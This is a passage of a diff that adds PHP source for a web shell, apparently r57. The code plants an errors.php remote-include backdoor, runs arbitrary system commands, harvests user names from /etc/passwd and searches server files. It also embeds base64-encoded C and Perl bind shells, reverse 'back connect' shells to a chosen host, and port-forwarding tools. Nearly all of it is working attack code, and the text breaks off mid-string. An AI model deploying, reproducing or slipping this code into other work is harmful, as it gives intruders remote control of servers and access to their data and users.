@getcwd(); +if (is_writable($dir)) +{ +$writ= "YES"; +$error= '<?include($_REQUEST["error"] . "/errors.php");?>'; +$fas=fopen("errors.php", "w"); +fputs($fas, $error); +fclose($fas); +$pwds="\nPWD: $dir";} +else {$writ= "NO";} +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#660000><font color=red face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\""; + if($checked) $ret .= " checked"; + return $ret.">"; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #660000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW 